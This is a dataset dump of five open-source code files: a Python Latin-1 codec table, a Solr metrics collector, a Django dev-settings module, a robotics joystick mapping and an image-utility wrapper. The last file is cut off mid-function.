repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
---|---|---|---|---|
MarishaYasko/interactive-stories-stands
|
refs/heads/master
|
InteractiveStands/Lib/encodings/iso8859_1.py
|
266
|
""" Python Character Mapping Codec iso8859_1 generated from 'MAPPINGS/ISO8859/8859-1.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-1',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
'\x00' # 0x00 -> NULL
'\x01' # 0x01 -> START OF HEADING
'\x02' # 0x02 -> START OF TEXT
'\x03' # 0x03 -> END OF TEXT
'\x04' # 0x04 -> END OF TRANSMISSION
'\x05' # 0x05 -> ENQUIRY
'\x06' # 0x06 -> ACKNOWLEDGE
'\x07' # 0x07 -> BELL
'\x08' # 0x08 -> BACKSPACE
'\t' # 0x09 -> HORIZONTAL TABULATION
'\n' # 0x0A -> LINE FEED
'\x0b' # 0x0B -> VERTICAL TABULATION
'\x0c' # 0x0C -> FORM FEED
'\r' # 0x0D -> CARRIAGE RETURN
'\x0e' # 0x0E -> SHIFT OUT
'\x0f' # 0x0F -> SHIFT IN
'\x10' # 0x10 -> DATA LINK ESCAPE
'\x11' # 0x11 -> DEVICE CONTROL ONE
'\x12' # 0x12 -> DEVICE CONTROL TWO
'\x13' # 0x13 -> DEVICE CONTROL THREE
'\x14' # 0x14 -> DEVICE CONTROL FOUR
'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x16 -> SYNCHRONOUS IDLE
'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
'\x18' # 0x18 -> CANCEL
'\x19' # 0x19 -> END OF MEDIUM
'\x1a' # 0x1A -> SUBSTITUTE
'\x1b' # 0x1B -> ESCAPE
'\x1c' # 0x1C -> FILE SEPARATOR
'\x1d' # 0x1D -> GROUP SEPARATOR
'\x1e' # 0x1E -> RECORD SEPARATOR
'\x1f' # 0x1F -> UNIT SEPARATOR
' ' # 0x20 -> SPACE
'!' # 0x21 -> EXCLAMATION MARK
'"' # 0x22 -> QUOTATION MARK
'#' # 0x23 -> NUMBER SIGN
'$' # 0x24 -> DOLLAR SIGN
'%' # 0x25 -> PERCENT SIGN
'&' # 0x26 -> AMPERSAND
"'" # 0x27 -> APOSTROPHE
'(' # 0x28 -> LEFT PARENTHESIS
')' # 0x29 -> RIGHT PARENTHESIS
'*' # 0x2A -> ASTERISK
'+' # 0x2B -> PLUS SIGN
',' # 0x2C -> COMMA
'-' # 0x2D -> HYPHEN-MINUS
'.' # 0x2E -> FULL STOP
'/' # 0x2F -> SOLIDUS
'0' # 0x30 -> DIGIT ZERO
'1' # 0x31 -> DIGIT ONE
'2' # 0x32 -> DIGIT TWO
'3' # 0x33 -> DIGIT THREE
'4' # 0x34 -> DIGIT FOUR
'5' # 0x35 -> DIGIT FIVE
'6' # 0x36 -> DIGIT SIX
'7' # 0x37 -> DIGIT SEVEN
'8' # 0x38 -> DIGIT EIGHT
'9' # 0x39 -> DIGIT NINE
':' # 0x3A -> COLON
';' # 0x3B -> SEMICOLON
'<' # 0x3C -> LESS-THAN SIGN
'=' # 0x3D -> EQUALS SIGN
'>' # 0x3E -> GREATER-THAN SIGN
'?' # 0x3F -> QUESTION MARK
'@' # 0x40 -> COMMERCIAL AT
'A' # 0x41 -> LATIN CAPITAL LETTER A
'B' # 0x42 -> LATIN CAPITAL LETTER B
'C' # 0x43 -> LATIN CAPITAL LETTER C
'D' # 0x44 -> LATIN CAPITAL LETTER D
'E' # 0x45 -> LATIN CAPITAL LETTER E
'F' # 0x46 -> LATIN CAPITAL LETTER F
'G' # 0x47 -> LATIN CAPITAL LETTER G
'H' # 0x48 -> LATIN CAPITAL LETTER H
'I' # 0x49 -> LATIN CAPITAL LETTER I
'J' # 0x4A -> LATIN CAPITAL LETTER J
'K' # 0x4B -> LATIN CAPITAL LETTER K
'L' # 0x4C -> LATIN CAPITAL LETTER L
'M' # 0x4D -> LATIN CAPITAL LETTER M
'N' # 0x4E -> LATIN CAPITAL LETTER N
'O' # 0x4F -> LATIN CAPITAL LETTER O
'P' # 0x50 -> LATIN CAPITAL LETTER P
'Q' # 0x51 -> LATIN CAPITAL LETTER Q
'R' # 0x52 -> LATIN CAPITAL LETTER R
'S' # 0x53 -> LATIN CAPITAL LETTER S
'T' # 0x54 -> LATIN CAPITAL LETTER T
'U' # 0x55 -> LATIN CAPITAL LETTER U
'V' # 0x56 -> LATIN CAPITAL LETTER V
'W' # 0x57 -> LATIN CAPITAL LETTER W
'X' # 0x58 -> LATIN CAPITAL LETTER X
'Y' # 0x59 -> LATIN CAPITAL LETTER Y
'Z' # 0x5A -> LATIN CAPITAL LETTER Z
'[' # 0x5B -> LEFT SQUARE BRACKET
'\\' # 0x5C -> REVERSE SOLIDUS
']' # 0x5D -> RIGHT SQUARE BRACKET
'^' # 0x5E -> CIRCUMFLEX ACCENT
'_' # 0x5F -> LOW LINE
'`' # 0x60 -> GRAVE ACCENT
'a' # 0x61 -> LATIN SMALL LETTER A
'b' # 0x62 -> LATIN SMALL LETTER B
'c' # 0x63 -> LATIN SMALL LETTER C
'd' # 0x64 -> LATIN SMALL LETTER D
'e' # 0x65 -> LATIN SMALL LETTER E
'f' # 0x66 -> LATIN SMALL LETTER F
'g' # 0x67 -> LATIN SMALL LETTER G
'h' # 0x68 -> LATIN SMALL LETTER H
'i' # 0x69 -> LATIN SMALL LETTER I
'j' # 0x6A -> LATIN SMALL LETTER J
'k' # 0x6B -> LATIN SMALL LETTER K
'l' # 0x6C -> LATIN SMALL LETTER L
'm' # 0x6D -> LATIN SMALL LETTER M
'n' # 0x6E -> LATIN SMALL LETTER N
'o' # 0x6F -> LATIN SMALL LETTER O
'p' # 0x70 -> LATIN SMALL LETTER P
'q' # 0x71 -> LATIN SMALL LETTER Q
'r' # 0x72 -> LATIN SMALL LETTER R
's' # 0x73 -> LATIN SMALL LETTER S
't' # 0x74 -> LATIN SMALL LETTER T
'u' # 0x75 -> LATIN SMALL LETTER U
'v' # 0x76 -> LATIN SMALL LETTER V
'w' # 0x77 -> LATIN SMALL LETTER W
'x' # 0x78 -> LATIN SMALL LETTER X
'y' # 0x79 -> LATIN SMALL LETTER Y
'z' # 0x7A -> LATIN SMALL LETTER Z
'{' # 0x7B -> LEFT CURLY BRACKET
'|' # 0x7C -> VERTICAL LINE
'}' # 0x7D -> RIGHT CURLY BRACKET
'~' # 0x7E -> TILDE
'\x7f' # 0x7F -> DELETE
'\x80' # 0x80 -> <control>
'\x81' # 0x81 -> <control>
'\x82' # 0x82 -> <control>
'\x83' # 0x83 -> <control>
'\x84' # 0x84 -> <control>
'\x85' # 0x85 -> <control>
'\x86' # 0x86 -> <control>
'\x87' # 0x87 -> <control>
'\x88' # 0x88 -> <control>
'\x89' # 0x89 -> <control>
'\x8a' # 0x8A -> <control>
'\x8b' # 0x8B -> <control>
'\x8c' # 0x8C -> <control>
'\x8d' # 0x8D -> <control>
'\x8e' # 0x8E -> <control>
'\x8f' # 0x8F -> <control>
'\x90' # 0x90 -> <control>
'\x91' # 0x91 -> <control>
'\x92' # 0x92 -> <control>
'\x93' # 0x93 -> <control>
'\x94' # 0x94 -> <control>
'\x95' # 0x95 -> <control>
'\x96' # 0x96 -> <control>
'\x97' # 0x97 -> <control>
'\x98' # 0x98 -> <control>
'\x99' # 0x99 -> <control>
'\x9a' # 0x9A -> <control>
'\x9b' # 0x9B -> <control>
'\x9c' # 0x9C -> <control>
'\x9d' # 0x9D -> <control>
'\x9e' # 0x9E -> <control>
'\x9f' # 0x9F -> <control>
'\xa0' # 0xA0 -> NO-BREAK SPACE
'\xa1' # 0xA1 -> INVERTED EXCLAMATION MARK
'\xa2' # 0xA2 -> CENT SIGN
'\xa3' # 0xA3 -> POUND SIGN
'\xa4' # 0xA4 -> CURRENCY SIGN
'\xa5' # 0xA5 -> YEN SIGN
'\xa6' # 0xA6 -> BROKEN BAR
'\xa7' # 0xA7 -> SECTION SIGN
'\xa8' # 0xA8 -> DIAERESIS
'\xa9' # 0xA9 -> COPYRIGHT SIGN
'\xaa' # 0xAA -> FEMININE ORDINAL INDICATOR
'\xab' # 0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
'\xac' # 0xAC -> NOT SIGN
'\xad' # 0xAD -> SOFT HYPHEN
'\xae' # 0xAE -> REGISTERED SIGN
'\xaf' # 0xAF -> MACRON
'\xb0' # 0xB0 -> DEGREE SIGN
'\xb1' # 0xB1 -> PLUS-MINUS SIGN
'\xb2' # 0xB2 -> SUPERSCRIPT TWO
'\xb3' # 0xB3 -> SUPERSCRIPT THREE
'\xb4' # 0xB4 -> ACUTE ACCENT
'\xb5' # 0xB5 -> MICRO SIGN
'\xb6' # 0xB6 -> PILCROW SIGN
'\xb7' # 0xB7 -> MIDDLE DOT
'\xb8' # 0xB8 -> CEDILLA
'\xb9' # 0xB9 -> SUPERSCRIPT ONE
'\xba' # 0xBA -> MASCULINE ORDINAL INDICATOR
'\xbb' # 0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
'\xbc' # 0xBC -> VULGAR FRACTION ONE QUARTER
'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
'\xbe' # 0xBE -> VULGAR FRACTION THREE QUARTERS
'\xbf' # 0xBF -> INVERTED QUESTION MARK
'\xc0' # 0xC0 -> LATIN CAPITAL LETTER A WITH GRAVE
'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
'\xc3' # 0xC3 -> LATIN CAPITAL LETTER A WITH TILDE
'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
'\xc5' # 0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE
'\xc6' # 0xC6 -> LATIN CAPITAL LETTER AE
'\xc7' # 0xC7 -> LATIN CAPITAL LETTER C WITH CEDILLA
'\xc8' # 0xC8 -> LATIN CAPITAL LETTER E WITH GRAVE
'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
'\xca' # 0xCA -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
'\xcc' # 0xCC -> LATIN CAPITAL LETTER I WITH GRAVE
'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
'\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS
'\xd0' # 0xD0 -> LATIN CAPITAL LETTER ETH (Icelandic)
'\xd1' # 0xD1 -> LATIN CAPITAL LETTER N WITH TILDE
'\xd2' # 0xD2 -> LATIN CAPITAL LETTER O WITH GRAVE
'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
'\xd5' # 0xD5 -> LATIN CAPITAL LETTER O WITH TILDE
'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
'\xd7' # 0xD7 -> MULTIPLICATION SIGN
'\xd8' # 0xD8 -> LATIN CAPITAL LETTER O WITH STROKE
'\xd9' # 0xD9 -> LATIN CAPITAL LETTER U WITH GRAVE
'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
'\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
'\xdd' # 0xDD -> LATIN CAPITAL LETTER Y WITH ACUTE
'\xde' # 0xDE -> LATIN CAPITAL LETTER THORN (Icelandic)
'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S (German)
'\xe0' # 0xE0 -> LATIN SMALL LETTER A WITH GRAVE
'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
'\xe3' # 0xE3 -> LATIN SMALL LETTER A WITH TILDE
'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
'\xe5' # 0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE
'\xe6' # 0xE6 -> LATIN SMALL LETTER AE
'\xe7' # 0xE7 -> LATIN SMALL LETTER C WITH CEDILLA
'\xe8' # 0xE8 -> LATIN SMALL LETTER E WITH GRAVE
'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
'\xea' # 0xEA -> LATIN SMALL LETTER E WITH CIRCUMFLEX
'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
'\xec' # 0xEC -> LATIN SMALL LETTER I WITH GRAVE
'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
'\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS
'\xf0' # 0xF0 -> LATIN SMALL LETTER ETH (Icelandic)
'\xf1' # 0xF1 -> LATIN SMALL LETTER N WITH TILDE
'\xf2' # 0xF2 -> LATIN SMALL LETTER O WITH GRAVE
'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
'\xf5' # 0xF5 -> LATIN SMALL LETTER O WITH TILDE
'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
'\xf7' # 0xF7 -> DIVISION SIGN
'\xf8' # 0xF8 -> LATIN SMALL LETTER O WITH STROKE
'\xf9' # 0xF9 -> LATIN SMALL LETTER U WITH GRAVE
'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
'\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
'\xfd' # 0xFD -> LATIN SMALL LETTER Y WITH ACUTE
'\xfe' # 0xFE -> LATIN SMALL LETTER THORN (Icelandic)
'\xff' # 0xFF -> LATIN SMALL LETTER Y WITH DIAERESIS
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
|
TinLe/Diamond
|
refs/heads/master
|
src/collectors/solr/solr.py
|
29
|
# coding=utf-8
"""
Collect the solr stats for the local node
#### Dependencies
* posixpath
* urllib2
* json
"""
import posixpath
import urllib2
try:
import json
except ImportError:
import simplejson as json
import diamond.collector
class SolrCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(SolrCollector, self).get_default_config_help()
config_help.update({
'host': "",
'port': "",
'core': "Which core info should collect (default: all cores)",
'stats': "Available stats: \n"
" - core (Core stats)\n"
" - response (Ping response stats)\n"
" - query (Query Handler stats)\n"
" - update (Update Handler stats)\n"
" - cache (fieldValue, filter,"
" document & queryResult cache stats)\n"
" - jvm (JVM information) \n"
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(SolrCollector, self).get_default_config()
config.update({
'host': 'localhost',
'port': 8983,
'path': 'solr',
'core': None,
'stats': ['jvm', 'core', 'response',
'query', 'update', 'cache'],
})
return config
def _try_convert(self, value):
if isinstance(value, (int, float)):
return value
try:
if '.' in value:
return float(value)
return int(value)
except ValueError:
return value
def _get(self, path):
url = 'http://%s:%i/%s' % (
self.config['host'], int(self.config['port']), path)
try:
response = urllib2.urlopen(url)
except Exception, err:
self.log.error("%s: %s", url, err)
return False
try:
return json.load(response)
except (TypeError, ValueError):
self.log.error("Unable to parse response from solr as a"
" json object")
return False
def collect(self):
if json is None:
self.log.error('Unable to import json')
return {}
cores = []
if self.config['core']:
cores = [self.config['core']]
else:
# If no core is specified, provide statistics for all cores
result = self._get('/solr/admin/cores?action=STATUS&wt=json')
if result:
cores = result['status'].keys()
metrics = {}
for core in cores:
if core:
path = "{0}.".format(core)
else:
path = ""
ping_url = posixpath.normpath(
"/solr/{0}/admin/ping?wt=json".format(core))
if 'response' in self.config['stats']:
result = self._get(ping_url)
if not result:
continue
metrics.update({
"{0}response.QueryTime".format(path):
result["responseHeader"]["QTime"],
"{0}response.Status".format(path):
result["responseHeader"]["status"],
})
stats_url = posixpath.normpath(
"/solr/{0}/admin/mbeans?stats=true&wt=json".format(core))
result = self._get(stats_url)
if not result:
continue
s = result['solr-mbeans']
stats = dict((s[i], s[i+1]) for i in xrange(0, len(s), 2))
if 'core' in self.config['stats']:
core_searcher = stats["CORE"]["searcher"]["stats"]
metrics.update([
("{0}core.{1}".format(path, key),
core_searcher[key])
for key in ("maxDoc", "numDocs", "warmupTime")
])
if 'query' in self.config['stats']:
standard = stats["QUERYHANDLER"]["standard"]["stats"]
update = stats["QUERYHANDLER"]["/update"]["stats"]
metrics.update([
("{0}queryhandler.standard.{1}".format(path, key),
standard[key])
for key in ("requests", "errors", "timeouts", "totalTime",
"avgTimePerRequest", "avgRequestsPerSecond")
])
metrics.update([
("{0}queryhandler.update.{1}".format(path, key),
update[key])
for key in ("requests", "errors", "timeouts", "totalTime",
"avgTimePerRequest", "avgRequestsPerSecond")
if update[key] != 'NaN'
])
if 'update' in self.config['stats']:
updatehandler = \
stats["UPDATEHANDLER"]["updateHandler"]["stats"]
metrics.update([
("{0}updatehandler.{1}".format(path, key),
updatehandler[key])
for key in (
"commits", "autocommits", "optimizes",
"rollbacks", "docsPending", "adds", "errors",
"cumulative_adds", "cumulative_errors")
])
if 'cache' in self.config['stats']:
cache = stats["CACHE"]
metrics.update([
("{0}cache.{1}.{2}".format(path, cache_type, key),
self._try_convert(cache[cache_type]['stats'][key]))
for cache_type in (
'fieldValueCache', 'filterCache',
'documentCache', 'queryResultCache')
for key in (
'lookups', 'hits', 'hitratio', 'inserts',
'evictions', 'size', 'warmupTime',
'cumulative_lookups', 'cumulative_hits',
'cumulative_hitratio', 'cumulative_inserts',
'cumulative_evictions')
])
if 'jvm' in self.config['stats']:
system_url = posixpath.normpath(
"/solr/{0}/admin/system?stats=true&wt=json".format(core))
result = self._get(system_url)
if not result:
continue
mem = result['jvm']['memory']
metrics.update([
('{0}jvm.mem.{1}'.format(path, key),
self._try_convert(mem[key].split()[0]))
for key in ('free', 'total', 'max', 'used')
])
for key in metrics:
self.publish(key, metrics[key])
|
clouserw/olympia
|
refs/heads/master
|
sites/altdev/settings_base.py
|
1
|
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import CACHE_PREFIX, ES_INDEXES, KNOWN_PROXIES, LOGGING
from .. import splitstrip
import private_base as private
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave']['sa_pool_key'] = 'slave'
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
}
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'amqp': {'level': logging.WARNING},
'raven': {'level': logging.WARNING},
'requests': {'level': logging.WARNING},
'z.addons': {'level': logging.INFO},
'z.task': { 'level': logging.DEBUG },
'z.hera': { 'level': logging.INFO },
'z.redis': { 'level': logging.DEBUG },
'z.pool': { 'level': logging.ERROR },
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' %
RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
PACKAGER_PATH = os.path.join(TMP_PATH, 'packager')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
PERF_THRESHOLD = 20
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'marketplace-altdev'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons-dev.allizom.org/repackage/sdk-versions/"
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_altdev' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons-dev.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
PERF_TEST_URL = 'http://talos-addon-master1.amotest.scl1.mozilla.com/trigger/trigger.cgi'
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
GEOIP_URL = 'http://geo-dev.marketplace.allizom.org'
AWS_ACCESS_KEY_ID = private.AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = private.AWS_SECRET_ACCESS_KEY
AWS_STORAGE_BUCKET_NAME = private.AWS_STORAGE_BUCKET_NAME
RAISE_ON_SIGNAL_ERROR = True
API_THROTTLE = False
AES_KEYS = private.AES_KEYS
|
Firebird1915/FRC2015PY
|
refs/heads/master
|
oi.py
|
4
|
import wpilib
from wpilib import SmartDashboard
from wpilib.buttons import JoystickButton
#import subsystems
from subsystems.drivetrain import DriveTrain
from subsystems.lift import LiftMech
from subsystems.pneumatics_comp import Pneumatics
#import commands
from commands.speed_toggle import SpeedToggle
from commands.pull_intake import PullIntake
from commands.lift_arm import MoveArm
from commands.armup import armUp
class OI:
def __init__(self, robot):
#Xbox controller
self.joy = wpilib.Joystick(0)
#Actual Joystick
self.joy_lift = wpilib.Joystick(1)
#Buttons for Xbox controller
self.r_trig = JoystickButton(self.joy, 6) #I think
#buttons for actual joystick
self.btn3 = JoystickButton(self.joy_lift, 3)
#self.btn4 = JoystickButton(self.joy_lift, 4)
self.btn7 = JoystickButton(self.joy_lift, 7)
#bind buttons on Xbox controller to commands
self.r_trig.toggleWhenPressed(SpeedToggle(robot.pneumatics_comp))
#bind buttons on Joystick to commands
# self.btn3.whileHeld(PullIntake(robot.intake))
self.btn7.whenPressed(armUp(robot.lift))
#self.btn3.whenPressed(PullIntake(Intake))
def getJoystick(self):
return self.joy
def getLiftstick(self):
return self.joy_lift
|
kenshay/ImageScripter
|
refs/heads/master
|
ProgramData/Android/ADB/platform-tools/systrace/catapult/telemetry/telemetry/util/image_util.py
|
31
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides implementations of basic image processing functions.
Implements basic image processing functions, such as reading/writing images,
cropping, finding the bounding box of a color and diffing images.
When numpy is present, image_util_numpy_impl is used for the implementation of
this interface. The old bitmap implementation (image_util_bitmap_impl) is used
as a fallback when numpy is not present."""
import base64
from telemetry.internal.util import external_modules
np = external_modules.ImportOptionalModule('numpy')
if np is None:
from telemetry.internal.image_processing import image_util_bitmap_impl
impl = image_util_bitmap_impl
else:
from telemetry.internal.image_processing import image_util_numpy_impl
impl = image_util_numpy_impl
def Channels(image):
"""Number of color channels in the image."""
return impl.Channels(image)
def Width(image):
"""Width of the image."""
return impl.Width(image)
def Height(image):
"""Height of the image."""
return impl.Height(image)
def Pixels(image):
"""Flat RGB pixel array of the image."""
return impl.Pixels(image)
def GetPixelColor(image, x, y):
"""Returns a RgbaColor for the pixel at (x, y)."""
return impl.GetPixelColor(image, x, y)
def WritePngFile(image, path):
"""Write an image to a PNG file.
Args:
image: an image object.
path: The path to the PNG file. Must end in 'png' or an
AssertionError will be raised."""
assert path.endswith('png')
return impl.WritePngFile(image, path)
def FromRGBPixels(width, height, pixels, bpp=3):
"""Create an image from an array of rgb pixels.
Ignores alpha channel if present.
Args:
width, height: int, the width and height of the image.
pixels: The flat array of pixels in the form of [r,g,b[,a],r,g,b[,a],...]
bpp: 3 for RGB, 4 for RGBA."""
return impl.FromRGBPixels(width, height, pixels, bpp)
def FromPng(png_data):
"""Create an image from raw PNG data."""
return impl.FromPng(png_data)
def FromPngFile(path):
"""Create an image from a PNG file.
Args:
path: The path to the PNG file."""
return impl.FromPngFile(path)
def FromBase64Png(base64_png):
"""Create an image from raw PNG data encoded in base64."""
return FromPng(base64.b64decode(base64_png))
def AreEqual(image1, image2, tolerance=0, likely_equal=True):
"""Determines whether two images are identical within a given tolerance.
Setting likely_equal to False enables short-circuit equality testing, which
is about 2-3x slower for equal images, but can be image height times faster
if the images are not equal."""
return impl.AreEqual(image1, image2, tolerance, likely_equal)
def Diff(image1, image2):
"""Returns a new image that represents the difference between this image
and another image."""
return impl.Diff(image1, image2)
def GetBoundingBox(image, color, tolerance=0):
"""Finds the minimum box surrounding all occurrences of bgr |color|.
Ignores the alpha channel.
Args:
color: RbgaColor, bounding box color.
tolerance: int, per-channel tolerance for the bounding box color.
Returns:
(top, left, width, height), match_count"""
return impl.GetBoundingBox(image, color, tolerance)
def Crop(image, left, top, width, height):
"""Crops the current image down to the specified box."""
